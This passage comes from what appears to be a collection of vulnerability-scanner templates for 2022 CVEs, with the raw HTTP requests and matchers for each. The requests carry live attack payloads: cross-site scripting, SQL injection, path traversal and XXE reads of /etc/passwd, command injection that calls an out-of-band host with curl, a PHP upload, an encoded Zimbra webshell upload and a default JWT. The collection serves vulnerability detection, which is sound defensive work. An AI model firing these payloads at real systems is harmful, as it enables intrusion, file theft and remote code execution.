application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38131","info":{"name":"RStudio Connect - Open Redirect","severity":"medium"},"requests":[{"raw":["GET //%5coast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[307]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32430","info":{"name":"Lin CMS Spring Boot - Default JWT Token","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/admin/group/all"],"headers":{"Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"level\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]},{"type":"word","part":"body","words":["<html","<body","<script"],"negative":true}]}]},{"id":"CVE-2022-45269","info":{"name":"Linx Sphere - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Component Based Setup"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://oast.me\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp","{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2174","info":{"name":"microweber 1.2.18 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(body, \"<script>alert(document.domain)</script>\") && contains(body, \"microweber\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-0814","info":{"name":"Ubigeo de Peru < 3.6.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["idProv","idDist","distrito"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart 